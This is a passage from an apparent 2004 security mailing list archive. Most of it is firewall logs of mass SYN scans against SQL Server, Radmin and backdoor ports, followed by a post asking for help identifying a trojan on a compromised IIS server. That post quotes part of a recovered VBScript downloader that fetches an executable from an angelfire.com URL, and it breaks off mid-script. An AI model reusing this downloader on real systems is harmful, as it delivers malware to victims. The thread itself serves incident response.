xxx.yyy.240.131:1433 SYN ******S* Jul 8 13:54:02 202.9.128.56:16724 -> xxx.yyy.244.82:1433 SYN ******S* Jul 8 13:54:02 202.9.128.56:16754 -> xxx.yyy.244.247:1433 SYN ******S* Jul 8 13:54:02 202.9.128.56:16784 -> xxx.yyy.248.33:1433 SYN ******S* Jul 8 13:54:02 202.9.128.56:16831 -> xxx.yyy.248.37:1433 SYN ******S* Jul 8 13:54:02 202.9.128.56:16846 -> xxx.yyy.248.45:1433 SYN ******S* Jul 8 13:54:03 202.9.128.56:16892 -> xxx.yyy.248.165:1433 SYN ******S* Jul 8 13:54:03 202.9.128.56:16900 -> xxx.yyy.252.95:1433 SYN ******S* 69012 Jul 8 21:09:25 68.161.179.104:3485 -> xxx.yyy.1.1:1433 SYN ******S* Jul 8 21:09:25 68.161.179.104:3486 -> xxx.yyy.1.2:1433 SYN ******S* Jul 8 21:09:22 68.161.179.104:3487 -> xxx.yyy.1.3:1433 SYN ******S* Jul 8 21:09:22 68.161.179.104:3488 -> xxx.yyy.1.4:1433 SYN ******S* Jul 8 21:09:22 68.161.179.104:3489 -> xxx.yyy.1.5:1433 SYN ******S* Jul 8 21:09:22 68.161.179.104:3490 -> xxx.yyy.1.6:1433 SYN ******S* Jul 8 21:09:25 68.161.179.104:3491 -> xxx.yyy.1.7:1433 SYN ******S* Jul 8 21:09:25 68.161.179.104:3492 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 8 21:25:28 68.161.179.104:3640 -> xxx.yyy.255.221:1433 SYN ******S* Jul 8 21:25:28 68.161.179.104:3641 -> xxx.yyy.255.222:1433 SYN ******S* Jul 8 21:25:28 68.161.179.104:3642 -> xxx.yyy.255.223:1433 SYN ******S* Jul 8 21:25:28 68.161.179.104:3643 -> xxx.yyy.255.224:1433 SYN ******S* Jul 8 21:25:28 68.161.179.104:3644 -> xxx.yyy.255.225:1433 SYN ******S* Jul 8 21:25:28 68.161.179.104:3645 -> xxx.yyy.255.226:1433 SYN ******S* Jul 8 21:25:28 68.161.179.104:3646 -> xxx.yyy.255.227:1433 SYN ******S* Jul 8 21:25:28 68.161.179.104:3647 -> xxx.yyy.255.228:1433 SYN ******S* 68797 Jul 8 14:22:03 62.103.164.195:1556 -> xxx.yyy.1.1:5554 SYN ******S* Jul 8 14:22:03 62.103.164.195:1557 -> xxx.yyy.1.2:5554 SYN ******S* Jul 8 14:22:03 62.103.164.195:1558 -> xxx.yyy.1.3:5554 SYN ******S* Jul 8 14:22:04 62.103.164.195:1559 -> xxx.yyy.1.4:5554 SYN ******S* Jul 8 14:22:04 62.103.164.195:1560 -> xxx.yyy.1.5:5554 SYN ******S* Jul 8 14:22:04 62.103.164.195:1561 -> xxx.yyy.1.6:5554 SYN ******S* Jul 8 14:22:04 62.103.164.195:1562 -> xxx.yyy.1.7:5554 SYN ******S* Jul 8 14:22:01 62.103.164.195:1563 -> xxx.yyy.1.8:5554 SYN ******S* [...] Jul 8 14:33:43 62.103.164.195:4184 -> xxx.yyy.255.246:5554 SYN ******S* Jul 8 14:33:43 62.103.164.195:4188 -> xxx.yyy.255.250:5554 SYN ******S* Jul 8 14:33:43 62.103.164.195:4187 -> xxx.yyy.255.249:5554 SYN ******S* Jul 8 14:33:43 62.103.164.195:4185 -> xxx.yyy.255.247:5554 SYN ******S* Jul 8 14:33:43 62.103.164.195:4189 -> xxx.yyy.255.251:5554 SYN ******S* Jul 8 14:33:43 62.103.164.195:4190 -> xxx.yyy.255.252:5554 SYN ******S* Jul 8 14:33:43 62.103.164.195:4186 -> xxx.yyy.255.248:5554 SYN ******S* Jul 8 14:33:43 62.103.164.195:4192 -> xxx.yyy.255.254:5554 SYN ******S* 68135 Jul 8 07:10:11 155.230.106.128:1140 -> xxx.yyy.1.1:1433 SYN ******S* Jul 8 07:10:08 155.230.106.128:1141 -> xxx.yyy.1.2:1433 SYN ******S* Jul 8 07:10:08 155.230.106.128:1142 -> xxx.yyy.1.3:1433 SYN ******S* Jul 8 07:10:08 155.230.106.128:1143 -> xxx.yyy.1.4:1433 SYN ******S* Jul 8 07:10:08 155.230.106.128:1144 -> xxx.yyy.1.5:1433 SYN ******S* Jul 8 07:10:08 155.230.106.128:1145 -> xxx.yyy.1.6:1433 SYN ******S* Jul 8 07:10:08 155.230.106.128:1146 -> xxx.yyy.1.7:1433 SYN ******S* Jul 8 07:10:11 155.230.106.128:1148 -> xxx.yyy.1.9:1433 SYN ******S* [...] Jul 8 07:47:36 155.230.106.128:1199 -> xxx.yyy.255.243:1433 SYN ******S* Jul 8 07:47:36 155.230.106.128:1201 -> xxx.yyy.255.245:1433 SYN ******S* Jul 8 07:47:36 155.230.106.128:1202 -> xxx.yyy.255.246:1433 SYN ******S* Jul 8 07:47:36 155.230.106.128:1203 -> xxx.yyy.255.247:1433 SYN ******S* Jul 8 07:47:36 155.230.106.128:1205 -> xxx.yyy.255.249:1433 SYN ******S* Jul 8 07:47:36 155.230.106.128:1206 -> xxx.yyy.255.250:1433 SYN ******S* Jul 8 07:47:36 155.230.106.128:1208 -> xxx.yyy.255.252:1433 SYN ******S* Jul 8 07:47:36 155.230.106.128:1209 -> xxx.yyy.255.253:1433 SYN ******S* Jul 8 07:47:36 155.230.106.128:1210 -> xxx.yyy.255.254:1433 SYN ******S* 61760 Jul 8 02:30:44 211.51.15.145:1197 -> xxx.yyy.1.1:4899 SYN ******S* Jul 8 02:30:44 211.51.15.145:1199 -> xxx.yyy.1.3:4899 SYN ******S* Jul 8 02:30:43 211.51.15.145:1200 -> xxx.yyy.1.4:4899 SYN ******S* Jul 8 02:30:43 211.51.15.145:1201 -> xxx.yyy.1.5:4899 SYN ******S* Jul 8 02:30:44 211.51.15.145:1198 -> xxx.yyy.1.2:4899 SYN ******S* Jul 8 02:30:43 211.51.15.145:1205 -> xxx.yyy.1.8:4899 SYN ******S* Jul 8 02:30:45 211.51.15.145:1209 -> xxx.yyy.1.11:4899 SYN ******S* Jul 8 02:30:44 211.51.15.145:1212 -> xxx.yyy.1.14:4899 SYN ******S* [...] Jul 8 02:34:56 211.51.15.145:1169 -> xxx.yyy.254.246:4899 SYN ******S* Jul 8 02:34:56 211.51.15.145:1171 -> xxx.yyy.254.248:4899 SYN ******S* Jul 8 02:34:56 211.51.15.145:1172 -> xxx.yyy.254.249:4899 SYN ******S* Jul 8 02:34:56 211.51.15.145:1176 -> xxx.yyy.254.253:4899 SYN ******S* Jul 8 02:34:57 211.51.15.145:4199 -> xxx.yyy.252.230:4899 SYN ******S* Jul 8 02:34:57 211.51.15.145:4174 -> xxx.yyy.252.223:4899 SYN ******S* Jul 8 02:34:57 211.51.15.145:4182 -> xxx.yyy.252.225:4899 SYN ******S* Jul 8 02:34:57 211.51.15.145:4185 -> xxx.yyy.252.226:4899 SYN ******S* Jul 8 02:34:57 211.51.15.145:4191 -> xxx.yyy.252.228:4899 SYN ******S* 44331 Jul 8 03:53:04 198.166.227.208:4538 -> xxx.yyy.1.1:4899 SYN ******S* Jul 8 03:53:04 198.166.227.208:4539 -> xxx.yyy.1.2:4899 SYN ******S* Jul 8 03:53:04 198.166.227.208:4540 -> xxx.yyy.1.3:4899 SYN ******S* Jul 8 03:53:03 198.166.227.208:4541 -> xxx.yyy.1.4:4899 SYN ******S* Jul 8 03:53:03 198.166.227.208:4542 -> xxx.yyy.1.5:4899 SYN ******S* Jul 8 03:53:03 198.166.227.208:4545 -> xxx.yyy.1.6:4899 SYN ******S* Jul 8 03:53:03 198.166.227.208:4546 -> xxx.yyy.1.7:4899 SYN ******S* Jul 8 03:53:03 198.166.227.208:4547 -> xxx.yyy.1.8:4899 SYN ******S* [...] Jul 8 03:57:19 198.166.227.208:1825 -> xxx.yyy.254.66:4899 SYN ******S* Jul 8 03:57:19 198.166.227.208:1826 -> xxx.yyy.254.67:4899 SYN ******S* Jul 8 03:57:19 198.166.227.208:1827 -> xxx.yyy.254.68:4899 SYN ******S* Jul 8 03:57:19 198.166.227.208:1828 -> xxx.yyy.254.69:4899 SYN ******S* Jul 8 03:57:19 198.166.227.208:1829 -> xxx.yyy.254.70:4899 SYN ******S* Jul 8 03:57:19 198.166.227.208:1830 -> xxx.yyy.254.71:4899 SYN ******S* Jul 8 03:57:19 198.166.227.208:1831 -> xxx.yyy.254.72:4899 SYN ******S* Jul 8 03:57:19 198.166.227.208:1832 -> xxx.yyy.254.73:4899 SYN ******S* Jul 8 03:57:19 198.166.227.208:1834 -> xxx.yyy.254.75:4899 SYN ******S* 44244 Jul 8 17:21:27 219.254.10.157:3897 -> xxx.yyy.1.3:4899 SYN ******S* Jul 8 17:21:27 219.254.10.157:3899 -> xxx.yyy.1.5:4899 SYN ******S* Jul 8 17:21:27 219.254.10.157:3901 -> xxx.yyy.1.7:4899 SYN ******S* Jul 8 17:21:28 219.254.10.157:3905 -> xxx.yyy.1.11:4899 SYN ******S* Jul 8 17:21:27 219.254.10.157:3906 -> xxx.yyy.1.12:4899 SYN ******S* Jul 8 17:21:28 219.254.10.157:3896 -> xxx.yyy.1.2:4899 SYN ******S* Jul 8 17:21:27 219.254.10.157:3898 -> xxx.yyy.1.4:4899 SYN ******S* Jul 8 17:21:27 219.254.10.157:3900 -> xxx.yyy.1.6:4899 SYN ******S* [...] Jul 8 17:24:47 219.254.10.157:4828 -> xxx.yyy.255.244:4899 SYN ******S* Jul 8 17:24:47 219.254.10.157:4829 -> xxx.yyy.255.245:4899 SYN ******S* Jul 8 17:24:47 219.254.10.157:4831 -> xxx.yyy.255.247:4899 SYN ******S* Jul 8 17:24:47 219.254.10.157:4832 -> xxx.yyy.255.248:4899 SYN ******S* Jul 8 17:24:47 219.254.10.157:4833 -> xxx.yyy.255.249:4899 SYN ******S* Jul 8 17:24:47 219.254.10.157:4835 -> xxx.yyy.255.251:4899 SYN ******S* Jul 8 17:24:47 219.254.10.157:4837 -> xxx.yyy.255.253:4899 SYN ******S* Jul 8 17:24:47 219.254.10.157:4836 -> xxx.yyy.255.252:4899 SYN ******S* 43648 Jul 8 21:40:57 216.177.21.38:4663 -> xxx.yyy.1.3:8000 SYN ******S* Jul 8 21:40:57 216.177.21.38:4664 -> xxx.yyy.1.4:8000 SYN ******S* Jul 8 21:40:57 216.177.21.38:4665 -> xxx.yyy.1.5:8000 SYN ******S* Jul 8 21:40:57 216.177.21.38:4666 -> xxx.yyy.1.6:8000 SYN ******S* Jul 8 21:40:57 216.177.21.38:4667 -> xxx.yyy.1.7:8000 SYN ******S* Jul 8 21:40:57 216.177.21.38:4668 -> xxx.yyy.1.8:8000 SYN ******S* Jul 8 21:40:57 216.177.21.38:4669 -> xxx.yyy.1.9:8000 SYN ******S* Jul 8 21:40:57 216.177.21.38:4670 -> xxx.yyy.1.10:8000 SYN ******S* [...] Jul 8 21:46:07 216.177.21.38:3392 -> xxx.yyy.255.236:8000 SYN ******S* Jul 8 21:46:07 216.177.21.38:3400 -> xxx.yyy.255.244:8000 SYN ******S* Jul 8 21:46:07 216.177.21.38:3401 -> xxx.yyy.255.245:8000 SYN ******S* Jul 8 21:46:07 216.177.21.38:3402 -> xxx.yyy.255.246:8000 SYN ******S* Jul 8 21:46:07 216.177.21.38:3404 -> xxx.yyy.255.248:8000 SYN ******S* Jul 8 21:46:07 216.177.21.38:3405 -> xxx.yyy.255.249:8000 SYN ******S* Jul 8 21:46:07 216.177.21.38:3408 -> xxx.yyy.255.252:8000 SYN ******S* Jul 8 21:46:07 216.177.21.38:3409 -> xxx.yyy.255.253:8000 SYN ******S* Jul 8 21:46:07 216.177.21.38:3410 -> xxx.yyy.255.254:8000 SYN ******S* 36688 Jul 8 16:02:22 172.206.112.210:3968 -> xxx.yyy.1.1:4899 SYN ******S* Jul 8 16:02:22 172.206.112.210:3969 -> xxx.yyy.1.2:4899 SYN ******S* Jul 8 16:02:20 172.206.112.210:3970 -> xxx.yyy.1.3:4899 SYN ******S* Jul 8 16:02:20 172.206.112.210:3971 -> xxx.yyy.1.4:4899 SYN ******S* Jul 8 16:02:20 172.206.112.210:3972 -> xxx.yyy.1.5:4899 SYN ******S* Jul 8 16:02:20 172.206.112.210:3973 -> xxx.yyy.1.6:4899 SYN ******S* Jul 8 16:02:20 172.206.112.210:3974 -> xxx.yyy.1.7:4899 SYN ******S* Jul 8 16:02:20 172.206.112.210:3975 -> xxx.yyy.1.8:4899 SYN ******S* [...] Jul 8 16:09:20 172.206.112.210:1934 -> xxx.yyy.255.246:4899 SYN ******S* Jul 8 16:09:20 172.206.112.210:1935 -> xxx.yyy.255.247:4899 SYN ******S* Jul 8 16:09:20 172.206.112.210:1936 -> xxx.yyy.255.248:4899 SYN ******S* Jul 8 16:09:20 172.206.112.210:1937 -> xxx.yyy.255.249:4899 SYN ******S* Jul 8 16:09:20 172.206.112.210:1938 -> xxx.yyy.255.250:4899 SYN ******S* Jul 8 16:09:20 172.206.112.210:1939 -> xxx.yyy.255.251:4899 SYN ******S* Jul 8 16:09:20 172.206.112.210:1940 -> xxx.yyy.255.252:4899 SYN ******S* Jul 8 16:09:20 172.206.112.210:1941 -> xxx.yyy.255.253:4899 SYN ******S* Jul 8 16:09:20 172.206.112.210:1942 -> xxx.yyy.255.254:4899 SYN ******S* 36540 Jul 8 00:17:02 202.69.200.13:56070 -> xxx.yyy.1.98:6112 SYN ******S* Jul 8 00:17:02 202.69.200.13:56043 -> xxx.yyy.1.72:6112 SYN ******S* Jul 8 00:17:02 202.69.200.13:56040 -> xxx.yyy.1.69:6112 SYN ******S* Jul 8 00:17:02 202.69.200.13:56042 -> xxx.yyy.1.71:6112 SYN ******S* Jul 8 00:17:02 202.69.200.13:56036 -> xxx.yyy.1.65:6112 SYN ******S* Jul 8 00:17:02 202.69.200.13:56034 -> xxx.yyy.1.63:6112 SYN ******S* Jul 8 00:17:02 202.69.200.13:56033 -> xxx.yyy.1.62:6112 SYN ******S* Jul 8 00:17:02 202.69.200.13:56032 -> xxx.yyy.1.61:6112 SYN ******S* [...] Jul 8 00:20:17 202.69.200.13:44513 -> xxx.yyy.255.213:6112 SYN ******S* Jul 8 00:20:17 202.69.200.13:44511 -> xxx.yyy.255.211:6112 SYN ******S* Jul 8 00:20:17 202.69.200.13:44507 -> xxx.yyy.255.207:6112 SYN ******S* Jul 8 00:20:17 202.69.200.13:44501 -> xxx.yyy.255.201:6112 SYN ******S* Jul 8 00:20:17 202.69.200.13:44493 -> xxx.yyy.255.193:6112 SYN ******S* Jul 8 00:20:17 202.69.200.13:44503 -> xxx.yyy.255.203:6112 SYN ******S* Jul 8 00:20:17 202.69.200.13:44500 -> xxx.yyy.255.200:6112 SYN ******S* Jul 8 00:20:17 202.69.200.13:44480 -> xxx.yyy.255.180:6112 SYN ******S* 30752 Jul 8 00:15:14 61.179.116.241:17661 -> xxx.yyy.1.1:4899 SYN ******S* Jul 8 00:15:14 61.179.116.241:17662 -> xxx.yyy.1.3:4899 SYN ******S* Jul 8 00:15:12 61.179.116.241:17295 -> xxx.yyy.1.5:4899 SYN ******S* Jul 8 00:15:12 61.179.116.241:17297 -> xxx.yyy.1.7:4899 SYN ******S* Jul 8 00:15:12 61.179.116.241:17299 -> xxx.yyy.1.9:4899 SYN ******S* Jul 8 00:15:14 61.179.116.241:17683 -> xxx.yyy.1.11:4899 SYN ******S* Jul 8 00:15:12 61.179.116.241:17303 -> xxx.yyy.1.13:4899 SYN ******S* Jul 8 00:15:12 61.179.116.241:17305 -> xxx.yyy.1.15:4899 SYN ******S* [...] Jul 8 00:21:40 61.179.116.241:32605 -> xxx.yyy.254.244:4899 SYN ******S* Jul 8 00:21:40 61.179.116.241:32616 -> xxx.yyy.254.246:4899 SYN ******S* Jul 8 00:21:40 61.179.116.241:32618 -> xxx.yyy.254.248:4899 SYN ******S* Jul 8 00:21:40 61.179.116.241:32620 -> xxx.yyy.254.250:4899 SYN ******S* Jul 8 00:21:40 61.179.116.241:32622 -> xxx.yyy.254.252:4899 SYN ******S* Jul 8 00:21:41 61.179.116.241:32162 -> xxx.yyy.253.115:4899 SYN ******S* Jul 8 00:21:43 61.179.116.241:32557 -> xxx.yyy.254.202:4899 SYN ******S* Jul 8 00:21:43 61.179.116.241:32561 -> xxx.yyy.254.206:4899 SYN ******S* Jul 8 00:21:43 61.179.116.241:32559 -> xxx.yyy.254.204:4899 SYN ******S* 26548 Jul 8 08:38:43 61.178.57.50:3084 -> xxx.yyy.1.2:4899 SYN ******S* Jul 8 08:38:43 61.178.57.50:3086 -> xxx.yyy.1.4:4899 SYN ******S* Jul 8 08:38:43 61.178.57.50:3088 -> xxx.yyy.1.6:4899 SYN ******S* Jul 8 08:38:45 61.178.57.50:3096 -> xxx.yyy.1.14:4899 SYN ******S* Jul 8 08:38:45 61.178.57.50:3098 -> xxx.yyy.1.16:4899 SYN ******S* Jul 8 08:38:44 61.178.57.50:3099 -> xxx.yyy.1.17:4899 SYN ******S* Jul 8 08:38:43 61.178.57.50:3100 -> xxx.yyy.1.18:4899 SYN ******S* Jul 8 08:38:45 61.178.57.50:3101 -> xxx.yyy.1.19:4899 SYN ******S* [...] Jul 8 08:43:14 61.178.57.50:4059 -> xxx.yyy.253.114:4899 SYN ******S* Jul 8 08:43:14 61.178.57.50:4051 -> xxx.yyy.253.106:4899 SYN ******S* Jul 8 08:43:14 61.178.57.50:4068 -> xxx.yyy.253.123:4899 SYN ******S* Jul 8 08:43:14 61.178.57.50:4063 -> xxx.yyy.253.118:4899 SYN ******S* Jul 8 08:43:14 61.178.57.50:4067 -> xxx.yyy.253.122:4899 SYN ******S* Jul 8 08:43:14 61.178.57.50:4062 -> xxx.yyy.253.117:4899 SYN ******S* Jul 8 08:43:14 61.178.57.50:4064 -> xxx.yyy.253.119:4899 SYN ******S* Jul 8 08:43:14 61.178.57.50:4048 -> xxx.yyy.253.103:4899 SYN ******S* 23077 Jul 8 03:43:34 61.172.22.240:3916 -> xxx.yyy.1.1:4899 SYN ******S* Jul 8 03:43:34 61.172.22.240:3961 -> xxx.yyy.1.4:4899 SYN ******S* Jul 8 03:43:34 61.172.22.240:3965 -> xxx.yyy.1.8:4899 SYN ******S* Jul 8 03:43:34 61.172.22.240:3966 -> xxx.yyy.1.9:4899 SYN ******S* Jul 8 03:43:34 61.172.22.240:3974 -> xxx.yyy.1.17:4899 SYN ******S* Jul 8 03:43:34 61.172.22.240:3979 -> xxx.yyy.1.22:4899 SYN ******S* Jul 8 03:43:34 61.172.22.240:3980 -> xxx.yyy.1.23:4899 SYN ******S* Jul 8 03:43:34 61.172.22.240:3981 -> xxx.yyy.1.24:4899 SYN ******S* [...] Jul 8 03:48:07 61.172.22.240:3262 -> xxx.yyy.254.233:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3264 -> xxx.yyy.254.235:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3267 -> xxx.yyy.254.238:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3276 -> xxx.yyy.254.247:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3277 -> xxx.yyy.254.248:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3278 -> xxx.yyy.254.249:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3280 -> xxx.yyy.254.251:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3281 -> xxx.yyy.254.252:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3282 -> xxx.yyy.254.253:4899 SYN ******S* 19258 Jul 8 09:59:06 217.165.60.135:4206 -> xxx.yyy.1.14:4899 SYN ******S* Jul 8 09:59:08 217.165.60.135:4205 -> xxx.yyy.1.13:4899 SYN ******S* Jul 8 09:59:08 217.165.60.135:4207 -> xxx.yyy.1.15:4899 SYN ******S* Jul 8 09:59:06 217.165.60.135:4208 -> xxx.yyy.1.16:4899 SYN ******S* Jul 8 09:59:06 217.165.60.135:4209 -> xxx.yyy.1.17:4899 SYN ******S* Jul 8 09:59:08 217.165.60.135:4210 -> xxx.yyy.1.18:4899 SYN ******S* Jul 8 09:59:07 217.165.60.135:4211 -> xxx.yyy.1.19:4899 SYN ******S* Jul 8 09:59:07 217.165.60.135:4212 -> xxx.yyy.1.20:4899 SYN ******S* [...] Jul 8 10:08:29 217.165.60.135:3214 -> xxx.yyy.90.103:4899 SYN ******S* Jul 8 10:08:29 217.165.60.135:3212 -> xxx.yyy.90.101:4899 SYN ******S* Jul 8 10:08:29 217.165.60.135:3211 -> xxx.yyy.90.100:4899 SYN ******S* Jul 8 10:08:29 217.165.60.135:3213 -> xxx.yyy.90.102:4899 SYN ******S* Jul 8 10:08:30 217.165.60.135:3218 -> xxx.yyy.90.107:4899 SYN ******S* Jul 8 10:08:30 217.165.60.135:3216 -> xxx.yyy.90.105:4899 SYN ******S* Jul 8 10:08:30 217.165.60.135:3217 -> xxx.yyy.90.106:4899 SYN ******S* Jul 8 10:08:30 217.165.60.135:3215 -> xxx.yyy.90.104:4899 SYN ******S* Jul 8 10:08:30 217.165.60.135:3219 -> xxx.yyy.90.108:4899 SYN ******S* 16283 Jul 8 23:55:48 220.87.13.46:3704 -> xxx.yyy.194.157:5554 SYN ******S* Jul 8 23:55:49 220.87.13.46:4238 -> xxx.yyy.194.157:1023 SYN ******S* Jul 8 23:55:48 220.87.13.46:3703 -> xxx.yyy.194.159:5554 SYN ******S* Jul 8 23:55:49 220.87.13.46:4236 -> xxx.yyy.194.159:1023 SYN ******S* Jul 8 23:55:48 220.87.13.46:3705 -> xxx.yyy.194.156:5554 SYN ******S* Jul 8 23:55:49 220.87.13.46:4239 -> xxx.yyy.194.156:1023 SYN ******S* Jul 8 23:55:48 220.87.13.46:3711 -> xxx.yyy.194.153:5554 SYN ******S* Jul 8 23:55:49 220.87.13.46:4242 -> xxx.yyy.194.153:1023 SYN ******S* [...] Jul 8 23:56:42 220.87.13.46:2326 -> xxx.yyy.214.107:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2327 -> xxx.yyy.214.106:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2329 -> xxx.yyy.214.102:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2341 -> xxx.yyy.214.122:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2344 -> xxx.yyy.214.119:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2355 -> xxx.yyy.214.95:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2359 -> xxx.yyy.214.99:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2360 -> xxx.yyy.214.105:9898 SYN ******S* 15215 Jul 8 00:44:24 221.192.35.112:3922 -> xxx.yyy.154.103:5554 SYN ******S* Jul 8 00:44:25 221.192.35.112:4273 -> xxx.yyy.154.103:1023 SYN ******S* Jul 8 00:44:24 221.192.35.112:3924 -> xxx.yyy.154.105:5554 SYN ******S* Jul 8 00:44:25 221.192.35.112:4275 -> xxx.yyy.154.105:1023 SYN ******S* Jul 8 00:44:24 221.192.35.112:3923 -> xxx.yyy.154.104:5554 SYN ******S* Jul 8 00:44:25 221.192.35.112:4274 -> xxx.yyy.154.104:1023 SYN ******S* Jul 8 00:44:24 221.192.35.112:3933 -> xxx.yyy.154.247:5554 SYN ******S* Jul 8 00:44:25 221.192.35.112:4287 -> xxx.yyy.154.247:1023 SYN ******S* [...] Jul 8 00:45:46 221.192.35.112:3378 -> xxx.yyy.154.226:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3336 -> xxx.yyy.154.218:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3380 -> xxx.yyy.154.229:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3385 -> xxx.yyy.154.216:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3386 -> xxx.yyy.154.234:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3388 -> xxx.yyy.154.238:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3391 -> xxx.yyy.154.212:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3408 -> xxx.yyy.154.239:9898 SYN ******S* 12641 Jul 8 00:56:43 61.55.196.247:2838 -> xxx.yyy.174.3:5554 SYN ******S* Jul 8 00:56:44 61.55.196.247:3360 -> xxx.yyy.174.3:1023 SYN ******S* Jul 8 00:56:43 61.55.196.247:2840 -> xxx.yyy.174.5:5554 SYN ******S* Jul 8 00:56:44 61.55.196.247:3362 -> xxx.yyy.174.5:1023 SYN ******S* Jul 8 00:56:43 61.55.196.247:2842 -> xxx.yyy.174.7:5554 SYN ******S* Jul 8 00:56:44 61.55.196.247:3357 -> xxx.yyy.174.7:1023 SYN ******S* Jul 8 00:56:43 61.55.196.247:2843 -> xxx.yyy.174.8:5554 SYN ******S* Jul 8 00:56:44 61.55.196.247:3358 -> xxx.yyy.174.8:1023 SYN ******S* [...] Jul 8 00:57:30 61.55.196.247:1226 -> xxx.yyy.194.68:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1220 -> xxx.yyy.194.84:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1283 -> xxx.yyy.194.100:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1286 -> xxx.yyy.194.102:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1284 -> xxx.yyy.194.101:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1321 -> xxx.yyy.194.121:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1311 -> xxx.yyy.194.112:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1323 -> xxx.yyy.194.124:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1344 -> xxx.yyy.194.123:9898 SYN ******S* 9600 Jul 8 00:55:53 221.200.105.189:1947 -> xxx.yyy.194.125:5554 SYN ******S* Jul 8 00:55:54 221.200.105.189:2471 -> xxx.yyy.194.125:1023 SYN ******S* Jul 8 00:55:56 221.200.105.189:3465 -> xxx.yyy.194.125:9898 SYN ******S* Jul 8 00:55:53 221.200.105.189:1952 -> xxx.yyy.194.128:5554 SYN ******S* Jul 8 00:55:56 221.200.105.189:3469 -> xxx.yyy.194.128:9898 SYN ******S* Jul 8 00:55:53 221.200.105.189:1953 -> xxx.yyy.194.129:5554 SYN ******S* Jul 8 00:55:56 221.200.105.189:3470 -> xxx.yyy.194.129:9898 SYN ******S* Jul 8 00:55:53 221.200.105.189:1951 -> xxx.yyy.194.127:5554 SYN ******S* [...] Jul 8 00:57:10 221.200.105.189:2555 -> xxx.yyy.214.241:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2556 -> xxx.yyy.214.240:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2554 -> xxx.yyy.214.228:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2558 -> xxx.yyy.214.242:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2562 -> xxx.yyy.214.245:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2565 -> xxx.yyy.214.238:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2564 -> xxx.yyy.214.237:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2566 -> xxx.yyy.214.243:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2584 -> xxx.yyy.214.244:9898 SYN ******S* 9132 Jul 8 00:56:38 202.69.92.104:1080 -> xxx.yyy.72.124:5554 SYN ******S* Jul 8 00:56:39 202.69.92.104:1517 -> xxx.yyy.72.124:1023 SYN ******S* Jul 8 00:56:38 202.69.92.104:1081 -> xxx.yyy.72.125:5554 SYN ******S* Jul 8 00:56:39 202.69.92.104:1524 -> xxx.yyy.72.125:1023 SYN ******S* Jul 8 00:56:41 202.69.92.104:2778 -> xxx.yyy.72.125:9898 SYN ******S* Jul 8 00:56:38 202.69.92.104:1082 -> xxx.yyy.72.126:5554 SYN ******S* Jul 8 00:56:39 202.69.92.104:1526 -> xxx.yyy.72.126:1023 SYN ******S* Jul 8 00:56:41 202.69.92.104:2779 -> xxx.yyy.72.126:9898 SYN ******S* [...] Jul 8 00:57:23 202.69.92.104:2986 -> xxx.yyy.91.247:9898 SYN ******S* Jul 8 00:57:23 202.69.92.104:2987 -> xxx.yyy.91.248:9898 SYN ******S* Jul 8 00:57:23 202.69.92.104:2988 -> xxx.yyy.92.172:9898 SYN ******S* Jul 8 00:57:23 202.69.92.104:2989 -> xxx.yyy.92.174:9898 SYN ******S* Jul 8 00:57:24 202.69.92.104:3262 -> xxx.yyy.92.215:9898 SYN ******S* Jul 8 00:57:24 202.69.92.104:3263 -> xxx.yyy.92.216:9898 SYN ******S* Jul 8 00:57:24 202.69.92.104:3272 -> xxx.yyy.92.218:9898 SYN ******S* Jul 8 00:57:24 202.69.92.104:3271 -> xxx.yyy.92.217:9898 SYN ******S* 9114 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From mducharme at cybergeneration.com Fri Jul 9 13:34:50 2004 From: mducharme at cybergeneration.com (Maxime Ducharme) Date: Fri, 9 Jul 2004 09:34:50 -0400 Subject: [Intrusions] Need help to identify a trojan Message-ID: <020e01c465b9$8268d500$a900a8c0@cybergeneration.com> Hi to the list, one of our customer's servers have been compromised and I'd need help to identify trojan used. Here is the server's setup : - Windows 2000 OS (2 updates missing, KB870669 and KB839643) - IIS 5.0 running with ASP applications - Serv-U FTP Server v4.0 - not firewalled ... :( I first found a file named "blabla.vbs" in C:\ which contains this script : Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://www.angelfire.com/comics/mumucake/lsassvc.exe",0 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 